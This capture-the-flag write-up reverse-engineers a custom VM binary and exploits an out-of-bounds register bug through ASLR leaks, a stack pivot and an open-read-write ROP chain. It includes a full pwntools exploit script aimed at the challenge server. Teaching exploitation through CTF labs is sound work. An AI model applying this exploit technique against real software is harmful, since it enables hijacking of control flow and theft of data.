HIP7CTF_Writeups/g_force.md

# Write-up: G-Force

**Category:** Pwn
**Difficulty:** Hard
**Description:** A custom JIT-compiled VM with a secure sandbox and content filtering.

In this challenge, we are faced with a custom Virtual Machine called "G-Force". The binary is statically linked and stripped, making reverse engineering a bit more involved. We are told it has a JIT compiler and a "secure, sandboxed memory space."

---

## 1. Initial Analysis

We start by inspecting the provided binary `g_forcevm`.

```bash
$ file g_forcevm
g_forcevm: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, BuildID[sha1]=..., for GNU/Linux 3.2.0, stripped
```

It is a **Static PIE** executable. This means it contains all its dependencies (no external libc), but it is Position Independent (ASLR is active). It is also **stripped**, so we have no function names.

Running the binary, we are greeted with a prompt and a help menu:

```text
--- G-FORCE VM v2.0 (Final) ---
4KB Secure Sandbox. Type 'help' for instructions.
> help

--- G-Force Instruction Set ---
General:
  MOVI R, IMM      : Load immediate value into Register R
  MOVR R1, R2      : Copy value from R2 to R1
...
Meta Commands:
  execute          : Compile and run the current program buffer
  info             : Dump current CPU state
  ram OFF LEN      : Hex dump of RAM at offset
  debug            : Run debug logger
...
```

## 2. Reverse Engineering

Using the Ghidra, we analyze the binary to understand the VM's internal structure and how it handles instructions.

### The VM Structure & Stack Layout
Analyzing the `main` function (decompiled at `0x0010ba79`), we can identify the variables used to store the CPU state.

```c
undefined8 FUN_0010ba79(void)
{
  // ...
  undefined1 local_20d8 [40];
  undefined8 local_20b0;
  undefined8 local_20a8;
  code *local_20a0;
  undefined1 local_2098 [8192];
  // ...

  // Initialization
  thunk_FUN_0012dff0(local_20d8,0,0x40); // memset

  // RAM Allocation
  // FUN_0012ac00 is likely malloc (or a wrapper).
  // 0x1000 = 4096 bytes (4KB)
  local_20a8 = FUN_0012ac00(0x1000);

  // Debug Function Pointer Initialization
  local_20a0 = FUN_00109a22;

  // Main Loop
  while( true ) {
      // ... command parsing ...
      iVar2 = thunk_FUN_0012d150(uVar4,"debug");
      if (iVar2 == 0) {
        // VULNERABLE CALL
        (*local_20a0)(local_20a8);
      }
      else {
        iVar2 = thunk_FUN_0012d150(uVar4,"execute");
        if (iVar2 == 0) {
          FUN_00115f80("[*] Compiling %d ops...\n",local_20f8);
          FUN_0010a2b8(local_20d8,local_2098,local_20f8);
          // ...
        }
      }
  }
}
```

We see `local_20d8` is an array of 40 bytes. This likely holds the registers (A, B, C, D, SP).
We see `local_20a0` is a function pointer initialized to `0x00109a22` (the default logger).
Crucially, look at the memory layout on the stack:
*   `local_20d8` (Registers) starts at offset `-0x20d8`.
*   `local_20a8` (RAM Pointer) starts at offset `-0x20a8`.
*   `local_20a0` (Func Ptr) starts at offset `-0x20a0`.

The distance between the registers array and the RAM pointer is `0x20d8 - 0x20a8 = 0x30`, which is **48 bytes**.
The distance between the registers array and the function pointer is `0x20d8 - 0x20a0 = 0x38`, which is **56 bytes**.

### Confirming the Layout via `info`
To confirm that `local_20d8` actually holds the registers, we can examine the function responsible for the `info` command (referred to as `FUN_00109cbe` in Ghidra).

```c
void FUN_00109cbe(undefined8 *param_1)
{
  FUN_0011d2b0("\n--- CPU STATE ---");
  FUN_00115f80("Reg A: 0x%016lx | Reg B: 0x%016lx\n",*param_1,param_1[1]);
  FUN_00115f80("Reg C: 0x%016lx | Reg D: 0x%016lx\n",param_1[2],param_1[3]);
  FUN_00115f80("SP   : 0x%016lx\n",param_1[5]);
  FUN_0011d2b0("-----------------");
  return;
}
```

This function takes a pointer to `local_20d8` as its argument.
*   `param_1[0]` corresponds to **Register A** (Offset 0).
*   `param_1[1]` corresponds to **Register B** (Offset 8).
*   `param_1[2]` corresponds to **Register C** (Offset 16).
*   `param_1[3]` corresponds to **Register D** (Offset 24).
*   `param_1[5]` corresponds to **SP** (Offset 40).

The fact that `info` prints these values directly from the `local_20d8` array confirms that this memory region represents the CPU's register file.

### Reconstructing the CPU Structure
Based on the memory layout and the `info` function, we can reconstruct the VM's internal `CPU` structure on the stack:

```c
struct CPU_Stack_Layout {
    uint64_t regs[4];         // Offset 0x00: Registers A, B, C, D
    uint64_t PC;              // Offset 0x20: Program Counter / reserved
    uint64_t SP;              // Offset 0x28: Stack Pointer (Offset 40)
    uint8_t *ram;             // Offset 0x30: Pointer to VM RAM (Offset 48)
    void (*debug_log)(char*); // Offset 0x38: Function pointer for 'debug' command (Offset 56)
};
```

This fits perfectly into our reconstructed layout!

### The Vulnerability: Out-of-Bounds Register Access
The instruction parser converts register names to indices.
- `a` -> 0
- `b` -> 1
- `c` -> 2
- `d` -> 3

However, the validation function `FUN_001099bf` allows letters up to `h`!

```c
int FUN_001099bf(char *param_1)
{
  // ...
      if ((*param_1 < 'a') || ('h' < *param_1)) {
        iVar1 = -1;
      }
      else {
        iVar1 = *param_1 + -0x61;
      }
  // ...
  return iVar1;
}
```

If we use register **`g`** (Index 6):
`Address = local_20d8 + (6 * 8) = local_20d8 + 48` -> This accesses the `ram` pointer.

If we use register **`h`** (Index 7):
`Address = local_20d8 + (7 * 8) = local_20d8 + 56` -> This accesses the `debug_log` function pointer!

This gives us two powerful primitives:
1.  **Arbitrary Read (Leak):** `MOVR a, h` reads the function pointer into register `a`. We can then view it via `info` to leak the ASLR base address. Similarly, `MOVR b, g` leaks the heap base.
2.  **Control Flow Hijack:** `MOVI h, <ADDR>` allows us to overwrite the function pointer with any address we want.

### The "Debug" Command
The `debug` command calls the function stored in `local_20a0` (register `h`). It passes the RAM pointer (register `g`) as the first argument (`rdi`).

```c
// Pseudo-code for debug command
if (cmd == "debug") {
    // local_20a0 points to default_logger by default
    // If we overwrite local_20a0, we control execution.
    // The first argument (RDI) is always the RAM pointer (local_20a8).
    (*local_20a0)(local_20a8);
}
```

## 3. Exploitation Strategy: The Battle Plan

To fully compromise the system, we need to bypass ASLR. Since there is a seccomp filter in place, we will need to use a read/write/open ROP chain instead of just popping a shell.

### Discovering the Seccomp Sandbox
While analyzing the binary, we encounter a function `FUN_0010b918` that is called early in `main`. Decompiling this function reveals how the "secure sandbox" mentioned in the description is implemented:

```c
void FUN_0010b918(void)
{
  // ...
  iVar1 = FUN_001636b0(0x26,1,0,0,0);
  if (iVar1 != 0) {
    FUN_001161b0("prctl(NO_NEW_PRIVS)");
    FUN_00115450(1);
  }
  iVar1 = FUN_001636b0(0x16,2,local_68);
  if (iVar1 != 0) {
    FUN_001161b0("prctl(SECCOMP)");
    FUN_00115450(1);
  }
  // ...
}
```

The function `FUN_001636b0` is a wrapper around the `prctl` syscall.
1.  **`prctl(PR_SET_NO_NEW_PRIVS, 1, ...)`**: This is called with `option = 38` (`0x26`), which corresponds to `PR_SET_NO_NEW_PRIVS`. This prevents the process (and its children) from gaining new privileges, disabling `setuid`/`setgid` binaries.
2.  **`prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...)`**: This is called with `option = 22` (`0x16`), which corresponds to `PR_SET_SECCOMP`. The second argument `2` specifies `SECCOMP_MODE_FILTER`. This applies a BPF (Berkeley Packet Filter) program to restrict which system calls the process can make.

Because of this Seccomp filter, standard exploitation techniques like calling `system("/bin/sh")` or executing an `execve` shellcode will fail (the kernel will kill the process). Instead, we must use an **Open-Read-Write (ORW)** ROP chain to explicitly open the flag file, read its contents into memory, and write them to standard output.

### Step 1: Leak Addresses (Defeat ASLR)
Since the binary is Position Independent (PIE), all code addresses are randomized. We need to find where the code is located in memory.
1.  **Leak Code Address:** We copy the function pointer into register `a` (`MOVR a, h`).
2.  **Leak Heap Address:** We copy the RAM pointer into register `b` (`MOVR b, g`).
3.  **Read the Leak:** We execute these instructions and use the VM's `info` command to read `Reg A` and `Reg B`. By subtracting the known static offset of the logger function (`0x00109a22`) from `Reg A`, we calculate the binary's **Base Address**.

### Step 2: Construct the ROP Chain and Place it in RAM
We need to call `syscall` (Linux x64 ABI). The calling convention is:
*   `RAX` = System Call Number
*   `RDI` = Argument 1
*   `RSI` = Argument 2
*   `RDX` = Argument 3

Here is how each command in the chain is constructed:

#### 1. `open("./flag.txt", 0)`
*   `pop rdi; ret` -> `ADDR_OF_STRING` (Pointer to "flag.txt\x00")
*   `pop rsi; ret` -> `0` (O_RDONLY)
*   `pop rax; ret` -> `2` (SYS_open)
*   `syscall; ret`

#### 2. `read(3, buffer, 0x100)`
*   `pop rdi; ret` -> `3` (File Descriptor, usually 3 since 0/1/2 are standard)
*   `pop rsi; ret` -> `ADDR_OF_BUFFER` (Pointer to writable memory, e.g., offset 0x300 in RAM)
*   `pop rdx; ret` -> `0x100` (Bytes to read)
*   `pop rax; ret` -> `0` (SYS_read)
*   `syscall; ret`

#### 3. `write(1, buffer, 0x100)`
*   `pop rdi; ret` -> `1` (stdout)
*   `pop rsi; ret` -> `ADDR_OF_BUFFER` (Pointer to where we read the flag)
*   `pop rdx; ret` -> `0x100` (Bytes to write)
*   `pop rax; ret` -> `1` (SYS_write)
*   `syscall; ret`

**Place in RAM:** We write this entire chain of 64-bit integers into the VM's RAM (starting at offset 0) using the `SAVER` VM instruction.

### Step 3: Find the Pivot
We have a ROP chain sitting in the heap (VM RAM), but the CPU is using the real stack. We need to point `RSP` (Stack Pointer) to our RAM so the CPU starts executing our chain.
1.  **Find the Pivot Gadget:** We identify a "Stack Pivot" gadget. Using `ROPgadget` on the binary reveals a perfect gadget: `mov rsp, rdi; ret` at offset `0x000099b8`.
2.  **Why this gadget?** When the `debug` command is called, the first argument (`RDI`) is a pointer to the VM's RAM (register `g`).
3.  **The Trigger:** If we jump to this gadget, it will copy `RDI` (RAM Ptr) into `RSP`. The subsequent `ret` will pop the first 8 bytes of our RAM into `RIP`, starting the ROP chain.

### Step 4: Overwrite the Function Pointer
Now that the ROP chain is placed in RAM and we have the address of our pivot gadget, we need to redirect execution flow.
1.  **Target Register H:** Writing to register `h` overwrites the `debug_log` function pointer.
2.  **The Payload:** We use `MOVI h, <ADDR_OF_PIVOT>` to replace the default logger address with the address of our stack pivot gadget.

### Step 5: Trigger the Chain
The final step is to execute the hijacked function pointer.
1.  **The Trigger Command:** We type `execute` to compile our writers, and then run `debug`.
2.  **Execution Flow:**
    *   The `main` loop calls the function pointer at register `h`.
    *   Since we overwrote it, it jumps to `mov rsp, rdi; ret`.
    *   `RDI` holds the RAM pointer, so `RSP` becomes the RAM pointer.
    *   The CPU executes `ret`, popping the first gadget from our ROP chain in RAM.
    *   The chain executes `open`, `read`, and `write`, printing the flag to our console!

## 4. The Solution Script

Here is the complete `solve.py` script. It automates the leakage, calculation, and payload delivery.

```python
#!/usr/bin/env python3
from pwn import *

# =============================================================================
# CONFIGURATION
# =============================================================================
OFFSET_DEFAULT_LOG = 0x00109a22
HOST = '87.106.77.47'
PORT = 1378

# Set context (still needed for packing/unpacking)
exe = './g_forcevm'
elf = ELF(exe, checksec=False)
context.binary = elf
context.log_level = 'info'

def start():
    # [CHANGE] Use remote() instead of process()
    return remote(HOST, PORT)

p = start()

def send_cmd(cmd):
    p.sendline(cmd.encode())

def wait_prompt():
    return p.recvuntil(b"> ")

log.info(f"--- G-Force Payload Builder (Target: {HOST}:{PORT}) ---")
wait_prompt()

# -----------------------------------------------------------------------------
# STEP 1: LIVE LEAK
# -----------------------------------------------------------------------------
log.info("STEP 1: Leaking Addresses...")
send_cmd("movr a, h")
wait_prompt()
send_cmd("movr b, g")
wait_prompt()
send_cmd("saver a, 0")
wait_prompt()
send_cmd("saver b, 8")
wait_prompt()
send_cmd("execute")
wait_prompt()

# Read the leaks
send_cmd("ram 0 16")
p.recvuntil(b"0000: ")
dump_line = p.recvline().decode().strip().split()
wait_prompt()
bytes_all = [int(b, 16) for b in dump_line]

leak_logger = 0
for i in range(8):
    leak_logger += bytes_all[i] << (i*8)

leak_heap = 0
for i in range(8):
    leak_heap += bytes_all[8+i] << (i*8)

binary_base = leak_logger - OFFSET_DEFAULT_LOG
addr_farm   = leak_logger - 0x75

# Gadgets
addr_pop_rdi = addr_farm + 0
addr_pop_rsi = addr_farm + 2
addr_pop_rdx = addr_farm + 4
addr_pop_rax = addr_farm + 6
addr_syscall = addr_farm + 8
addr_pivot   = addr_farm + 11

log.success(f"    Leaked Logger: {hex(leak_logger)}")
log.success(f"    Leaked Heap:   {hex(leak_heap)}")
log.success(f"    Base address:  {hex(binary_base)}")
log.success(f"    Addr Farm:     {hex(addr_farm)}")

# -----------------------------------------------------------------------------
# STEP 2: CONSTRUCT CHAIN
# -----------------------------------------------------------------------------
log.info("STEP 2: Construct ROP chain...")

chain = [
    # --- OPEN("./flag.txt", 0, 0) ---
    addr_pop_rdi,
    leak_heap + 0x200, # ptr to "./flag.txt"
    addr_pop_rsi,
    0,
    addr_pop_rdx,
    0,
    addr_pop_rax,
    2,
    addr_syscall,

    # --- READ(3, buffer, 100) ---
    addr_pop_rdi,
    3,
    addr_pop_rsi,
    leak_heap + 0x300, # ptr to buffer
    addr_pop_rdx,
    100,
    addr_pop_rax,
    0,
    addr_syscall,

    # --- WRITE(1, buffer, 64) ---
    addr_pop_rdi,
    1,
    addr_pop_rsi,
    leak_heap + 0x300,
    addr_pop_rdx,
    35,
    addr_pop_rax,
    1,
    addr_syscall,

    # --- EXIT(0) ---
    addr_pop_rdi,
    0,
    addr_pop_rax,
    60,
    addr_syscall,
]

# Send chain
i = 0
while i < len(chain):
    send_cmd(f"movi a,{hex(chain[i])}")
    wait_prompt()
    send_cmd(f"saver a,{hex(i*8)}")
    wait_prompt()
    i = i+1

# Send string "./flag.txt" at offset 0x200
flag_str = b'./flag.txt\0'
for i in range(0, len(flag_str), 8):
    chunk = flag_str[i:i+8].ljust(8, b'\0')
    val = u64(chunk)
    send_cmd(f"movi a, {hex(val)}")
    wait_prompt()
    send_cmd(f"saver a,{0x200 + i}")
    wait_prompt()

# Execute chain placement
send_cmd("execute")
p.recvuntil(b"> ")
send_cmd("ram 0x00 0x30")
p.recvuntil(b"> ")
log.success(f"    ROP Chain placed")

# -----------------------------------------------------------------------------
# STEP 3: ARM & TRIGGER
# -----------------------------------------------------------------------------
log.info("STEP 3: Arming...")
send_cmd(f"movi h,{hex(addr_pivot)}")
wait_prompt()
send_cmd(f"execute")
p.recvuntil(b"> ")
log.success(f"    Armed")

log.info("STEP 4: Trigger...")
# Removed input() pause for automated remote exploitation, add back if needed
#input("Press [ENTER] to trigger...")

log.info("Executing...")
send_cmd(f"debug")

try:
    # recvall is essential here as the remote closes connection after exit()
    output = p.recvall(timeout=3)

    print("\n" + "="*50)
    print("FINAL OUTPUT:")
    print(output.decode(errors='ignore'))
    print("="*50)

except Exception as e:
    log.error(f"Error receiving flag: {e}")

p.close()
```